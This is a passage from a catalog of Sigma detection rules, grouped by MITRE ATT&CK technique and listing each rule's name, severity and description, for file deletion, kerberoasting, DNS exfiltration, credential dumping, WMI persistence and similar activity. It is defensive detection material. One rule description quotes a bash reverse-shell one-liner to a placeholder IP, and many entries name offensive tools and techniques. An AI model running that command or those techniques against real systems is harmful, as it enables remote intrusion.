    Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
  • Password Protected Compressed File Extraction Via 7Zip - Level: low
    Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
  • Potentially Suspicious Compression Tool Parameters - Level: medium
    Description: Detects potentially suspicious command line arguments of common data compression tools
  • Potential Exfiltration of Compressed Files - Level: medium
    Description: This rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body
attack.t1070.004 16
Show Rules (16)
  • Sysinternals SDelete Registry Keys - Level: medium
    Description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.
  • File Deletion - Level: informational
    Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
  • Cisco File Deletion - Level: medium
    Description: See what files are being deleted from flash file systems
  • Backup Catalog Deleted - Level: medium
    Description: Detects backup catalog deletions
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
  • Prefetch File Deleted - Level: high
    Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
  • TeamViewer Log File Deleted - Level: low
    Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
  • File Deleted Via Sysinternals SDelete - Level: medium
    Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
  • ADS Zone.Identifier Deleted By Uncommon Application - Level: medium
    Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
  • File Deletion Via Del - Level: low
    Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
  • Greedy File Deletion Using Del - Level: medium
    Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
  • Potentially Suspicious Ping/Copy Command Combination - Level: medium
    Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
  • Suspicious Ping/Del Command Combination - Level: high
    Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example
  • Directory Removal Via Rmdir - Level: low
    Description: Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
  • ADS Zone.Identifier Deleted - Level: low
    Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
  • Use Of Remove-Item to Delete File - ScriptBlock - Level: low
    Description: PowerShell Remove-Item with -Path to delete a file or a folder with "-Recurse"
attack.t1558.003 16
Show Rules (16)
  • Kerberos Network Traffic RC4 Ticket Encryption - Level: medium
    Description: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting
  • Kerberoasting Activity - Initial Query - Level: medium
    Description: This rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert.
  • Register new Logon Process by Rubeus - Level: high
    Description: Detects potential use of Rubeus via registered new trusted logon process
  • Uncommon Outbound Kerberos Connection - Security - Level: medium
    Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
  • Suspicious Kerberos RC4 Ticket Encryption - Level: medium
    Description: Detects service ticket requests using RC4 encryption type
  • User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' - Level: high
    Description: The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.
  • Potential CVE-2021-42287 Exploitation Attempt - Level: medium
    Description: The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
  • No Suitable Encryption Key Found For Generating Kerberos Ticket - Level: low
    Description: Detects errors when a target server doesn't have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.
  • HackTool - Rubeus Execution - ScriptBlock - Level: high
    Description: Detects the execution of the hacktool Rubeus using specific command line flags
  • Request A Single Ticket via PowerShell - Level: high
    Description: utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.
  • HackTool - KrbRelay Execution - Level: high
    Description: Detects the use of KrbRelay, a Kerberos relaying tool
  • HackTool - KrbRelayUp Execution - Level: high
    Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
  • HackTool - RemoteKrbRelay Execution - Level: high
    Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
  • HackTool - Rubeus Execution - Level: critical
    Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
  • Potential SPN Enumeration Via Setspn.EXE - Level: medium
    Description: Detects service principal name (SPN) enumeration used for Kerberoasting
  • Potential CVE-2021-42278 Exploitation Attempt - Level: medium
    Description: The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
attack.t1048.003 15
Show Rules (15)
  • Data Exfiltration with Wget - Level: medium
    Description: Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
  • Suspicious DNS Query with B64 Encoded String - Level: medium
    Description: Detects suspicious DNS queries using base64 encoding
  • WebDav Put Request - Level: low
    Description: A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.
  • Suspicious Outbound SMTP Connections - Level: medium
    Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
  • PowerShell ICMP Exfiltration - Level: medium
    Description: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
  • Suspicious WebDav Client Execution Via Rundll32.EXE - Level: high
    Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
  • WebDav Client Execution Via Rundll32.EXE - Level: medium
    Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
  • Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet - Level: medium
    Description: Detects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
  • Possible DNS Tunneling - Level: high
    Description: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.
  • High DNS Bytes Out - Level: medium
    Description: High DNS queries bytes amount from host per short period of time
  • High NULL Records Requests Rate - Level: medium
    Description: Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution
  • High DNS Requests Rate - Level: medium
    Description: High DNS requests amount from host per short period of time
  • High TXT Records Requests Rate - Level: medium
    Description: Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution
  • High DNS Bytes Out - Firewall - Level: medium
    Description: High DNS queries bytes amount from host per short period of time
  • High DNS Requests Rate - Firewall - Level: medium
    Description: High DNS requests amount from host per short period of time
attack.t1087.001 14
Show Rules (14)
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Local System Accounts Discovery - Linux - Level: low
    Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
  • Local System Accounts Discovery - MacOs - Level: low
    Description: Detects enumeration of local systeam accounts on MacOS
  • Cisco Collect Data - Level: low
    Description: Collect pertinent data from the configuration files
  • BloodHound Collection Files - Level: high
    Description: Detects default file names outputted by the BloodHound collection tool SharpHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • Suspicious Group And Account Reconnaissance Activity Using Net.EXE - Level: medium
    Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
  • Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet - Level: medium
    Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Local Accounts Discovery - Level: low
    Description: Local accounts, System Owner/User discovery using operating systems utilities
  • Suspicious Use of PsLogList - Level: medium
    Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1036.005 14
Show Rules (14)
  • Creation Of Pod In System Namespace - Level: medium
    Description: Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.
  • Flash Player Update from Suspicious Location - Level: high
    Description: Detects a flashplayer update from an unofficial location
  • Files With System DLL Name In Unsuspected Locations - Level: medium
    Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.
  • Files With System Process Name In Unsuspected Locations - Level: medium
    Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.
  • Suspicious Files in Default GPO Folder - Level: medium
    Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
  • Potential MsiExec Masquerading - Level: high
    Description: Detects the execution of msiexec.exe from an uncommon directory
  • Suspicious Scheduled Task Creation via Masqueraded XML File - Level: medium
    Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
  • Windows Processes Suspicious Parent Directory - Level: low
    Description: Detect suspicious parent processes of well-known Windows processes
  • Suspicious Process Masquerading As SvcHost.EXE - Level: high
    Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
  • Uncommon Svchost Parent Process - Level: medium
    Description: Detects an uncommon svchost parent process
  • Exploit for CVE-2015-1641 - Level: critical
    Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
  • Lazarus System Binary Masquerading - Level: high
    Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
  • Small Sieve Malware File Indicator Creation - Level: high
    Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
attack.t1136.001 14
Show Rules (14)
  • Creation Of An User Account - Level: medium
    Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
  • Privileged User Has Been Created - Level: high
    Description: Detects the addition of a new user to a privileged group such as "root" or "sudo"
  • Creation Of A Local User Account - Level: low
    Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
  • Cisco Local Accounts - Level: high
    Description: Find local accounts being created or modified as well as remote authentication configurations
  • Hidden Local User Creation - Level: high
    Description: Detects the creation of a local hidden user account which should not happen for event ID 4720.
  • Suspicious Windows ANONYMOUS LOGON Local Account Created - Level: high
    Description: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
  • Local User Creation - Level: low
    Description: Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.
  • PowerShell Create Local User - Level: medium
    Description: Detects creation of a local user via PowerShell
  • New User Created Via Net.EXE - Level: medium
    Description: Identifies the creation of local users via the net.exe command.
  • New User Created Via Net.EXE With Never Expire Option - Level: high
    Description: Detects creation of local users via the net.exe command with the option "never expire"
  • User Added to Remote Desktop Users Group - Level: high
    Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
  • Creation of a Local Hidden User Account by Registry - Level: high
    Description: Sysmon registry detection of a local hidden user account.
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322 - Level: critical
    Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
  • DarkGate - User Created Via Net.EXE - Level: high
    Description: Detects creation of local users via the net.exe command with the name of "DarkGate"
attack.t1021.001 14
Show Rules (14)
  • Publicly Accessible RDP Service - Level: high
    Description: Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.
  • Denied Access To Remote Desktop - Level: medium
    Description: This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.
  • RDP over Reverse SSH Tunnel WFP - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address
  • RDP Login from Localhost - Level: high
    Description: RDP login with localhost source address may be a tunnelled login
  • Outbound RDP Connections Over Non-Standard Tools - Level: high
    Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
  • RDP Over Reverse SSH Tunnel - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
  • RDP to HTTP or HTTPS Target Ports - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
  • New Remote Desktop Connection Initiated Via Mstsc.EXE - Level: medium
    Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
  • Suspicious Plink Port Forwarding - Level: high
    Description: Detects suspicious Plink tunnel port forwarding to a local port
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE - Level: high
    Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
  • Port Forwarding Activity Via SSH.EXE - Level: medium
    Description: Detects port forwarding activity via SSH.exe
  • User Added to Remote Desktop Users Group - Level: high
    Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
  • Suspicious RDP Redirect Using TSCON - Level: high
    Description: Detects a suspicious RDP session redirect using tscon.exe
  • Hermetic Wiper TG Process Patterns - Level: high
    Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
attack.t1069.002 13
Show Rules (13)
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP - Level: medium
    Description: Detects potential Active Directory enumeration via LDAP
  • Reconnaissance Activity - Level: high
    Description: Detects activity as "net user administrator /domain" and "net group domain admins /domain"
  • BloodHound Collection Files - Level: high
    Description: Detects default file names outputted by the BloodHound collection tool SharpHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Active Directory Group Enumeration With Get-AdGroup - Level: low
    Description: Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • Renamed AdFind Execution - Level: high
    Description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1003.004 12
Show Rules (12)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Possible Impacket SecretDump Remote Activity - Zeek - Level: high
    Description: Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
  • DPAPI Domain Backup Key Extraction - Level: high
    Description: Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers
  • DPAPI Domain Master Key Backup Attempt - Level: medium
    Description: Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.
  • Possible Impacket SecretDump Remote Activity - Level: high
    Description: Detect AD credential dumping using impacket secretdump HKTL
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Cred Dump Tools Dropped Files - Level: high
    Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
  • HackTool - Credential Dumping Tools Named Pipe Created - Level: critical
    Description: Detects well-known credential dumping tools execution via specific named pipe creation
  • HackTool - Mimikatz Execution - Level: high
    Description: Detection well-known mimikatz command line arguments
  • Dumping of Sensitive Hives Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
attack.t1567.002 12
Show Rules (12)
  • RClone Execution - Level: high
    Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
  • Rclone Execution via Command Line or PowerShell - Level: high
    Description: Detects Rclone which is commonly used by ransomware groups for exfiltration
  • Rclone Activity via Proxy - Level: medium
    Description: Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
  • DNS Query for Anonfiles.com Domain - DNS Client - Level: high
    Description: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes
  • DNS Query To MEGA Hosting Website - DNS Client - Level: medium
    Description: Detects DNS queries for subdomains related to MEGA sharing website
  • DNS Query To Ufile.io - DNS Client - Level: low
    Description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
  • DNS Query for Anonfiles.com Domain - Sysmon - Level: high
    Description: Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes
  • DNS Query To MEGA Hosting Website - Level: medium
    Description: Detects DNS queries for subdomains related to MEGA sharing website
  • DNS Query To Ufile.io - Level: low
    Description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
  • Rclone Config File Creation - Level: medium
    Description: Detects Rclone config files being created
  • PUA - Rclone Execution - Level: high
    Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
  • APT40 Dropbox Tool User Agent - Level: high
    Description: Detects suspicious user agent string of APT40 Dropbox tool
attack.t1546.003 12
Show Rules (12)
  • WMI Persistence - Security - Level: medium
    Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
  • WMI Persistence - Level: medium
    Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
  • WMI Persistence - Script Event Consumer File Write - Level: high
    Description: Detects file writes of WMI script event consumer
  • WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load - Level: medium
    Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
  • WMI Persistence - Command Line Event Consumer - Level: high
    Description: Detects WMI command line event consumers
  • Powershell WMI Persistence - Level: medium
    Description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
  • New ActiveScriptEventConsumer Created Via Wmic.EXE - Level: high
    Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
  • WMI Backdoor Exchange Transport Agent - Level: critical
    Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
  • WMI Persistence - Script Event Consumer - Level: medium
    Description: Detects WMI script event consumers
  • WMI Event Subscription - Level: medium
    Description: Detects creation of WMI event subscription persistence method
  • Suspicious Encoded Scripts in a WMI Consumer - Level: high
    Description: Detects suspicious encoded payloads in WMI Event Consumers
  • Potential Remote WMI ActiveScriptEventConsumers Activity - Level: medium
    Description: Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
attack.t1553.004 11
Show Rules (11)
  • Root Certificate Installed - Level: medium
    Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • Install Root Certificate - Level: low
    Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
  • Suspicious Package Installed - Linux - Level: medium
    Description: Detects installation of suspicious packages using system installation utilities
  • Cisco Crypto Commands - Level: high
    Description: Show when private keys are being exported from the device, or when new certificates are installed
  • Active Directory Certificate Services Denied Certificate Enrollment Request - Level: low
    Description: Detects denied requests by Active Directory Certificate Services. Example of these requests denial include issues with permissions on the certificate template or invalid signatures.
  • Root Certificate Installed - PowerShell - Level: medium
    Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • Suspicious X509Enrollment - Ps Script - Level: medium
    Description: Detect use of X509Enrollment
  • New Root Certificate Installed Via CertMgr.EXE - Level: medium
    Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • New Root Certificate Installed Via Certutil.EXE - Level: medium
    Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • Root Certificate Installed From Susp Locations - Level: high
    Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • Suspicious X509Enrollment - Process Creation - Level: medium
    Description: Detect use of X509Enrollment
attack.t1546.015 11
Show Rules (11)
  • Potential Persistence Via COM Hijacking From Suspicious Locations - Level: high
    Description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location.
  • Potential Persistence Via COM Search Order Hijacking - Level: medium
    Description: Detects potential COM object hijacking leveraging the COM Search Order
  • Suspicious GetTypeFromCLSID ShellExecute - Level: medium
    Description: Detects suspicious Powershell code that execute COM Objects
  • Rundll32 Registered COM Objects - Level: high
    Description: load malicious registered COM objects
  • Potential COM Object Hijacking Via TreatAs Subkey - Registry - Level: medium
    Description: Detects COM object hijacking via TreatAs subkey
  • Potential Persistence Using DebugPath - Level: medium
    Description: Detects potential persistence using Appx DebugPath
  • Potential PSFactoryBuffer COM Hijacking - Level: high
    Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
  • COM Object Hijacking Via Modification Of Default System CLSID Default Value - Level: high
    Description: Detects potential COM object hijacking via modification of default system CLSID.
  • Potential Persistence Via Scrobj.dll COM Hijacking - Level: medium
    Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
  • COM Hijacking via TreatAs - Level: medium
    Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command
  • SOURGUM Actor Behaviours - Level: high
    Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
attack.t1021.003 11
Show Rules (11)
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon - Level: critical
    Description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.
  • Remote DCOM/WMI Lateral Movement - Level: high
    Description: Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security - Level: high
    Description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.
  • Potential DCOM InternetExplorer.Application DLL Hijack - Level: critical
    Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
  • Potential DCOM InternetExplorer.Application DLL Hijack - Image Load - Level: critical
    Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
  • Suspicious WSMAN Provider Image Loads - Level: medium
    Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
  • Suspicious Non PowerShell WSMAN COM Provider - Level: medium
    Description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
  • HackTool - Potential Impacket Lateral Movement Activity - Level: high
    Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
  • MMC20 Lateral Movement - Level: high
    Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
  • MMC Spawning Windows Shell - Level: high
    Description: Detects a Windows command line executable started from MMC
  • Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp - Level: high
    Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
attack.t1059.004 11
Show Rules (11)
  • AWS EC2 Startup Shell Script Change - Level: high
    Description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
  • Suspicious Commands Linux - Level: medium
    Description: Detects relevant commands often related to malware or hacking activity
  • Equation Group Indicators - Level: high
    Description: Detects suspicious shell commands used in various Equation Group scripts and tools
  • Suspicious Activity in Shell Commands - Level: high
    Description: Detects suspicious shell commands used in various exploit codes (see references)
  • Suspicious Reverse Shell Command Line - Level: high
    Description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
  • JexBoss Command Sequence - Level: high
    Description: Detects suspicious command sequence that JexBoss
  • Linux Reverse Shell Indicator - Level: critical
    Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
  • BPFtrace Unsafe Option Usage - Level: medium
    Description: Detects the usage of the unsafe bpftrace option
  • Nohup Execution - Level: medium
    Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
  • Interactive Bash Suspicious Children - Level: medium
    Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
  • Privilege Escalation Preparation - Level: medium
    Description: Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.
attack.t1587.001 11
Show Rules (11)
  • ProxyLogon MSExchange OabVirtualDirectory - Level: critical
    Description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
  • Uncommon File Created In Office Startup Folder - Level: high
    Description: Detects the creation of a file with an uncommon extension in an Office application startup folder
  • VHD Image Download Via Browser - Level: medium
    Description: Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
  • PUA - CsExec Execution - Level: high
    Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
  • PsExec/PAExec Escalation to LOCAL SYSTEM - Level: high
    Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
  • Potential PsExec Remote Execution - Level: high
    Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
  • Potential Privilege Escalation To LOCAL SYSTEM - Level: high
    Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges
  • Formbook Process Creation - Level: high
    Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
  • Mustang Panda Dropper - Level: high
    Description: Detects specific process parameters as used by Mustang Panda droppers
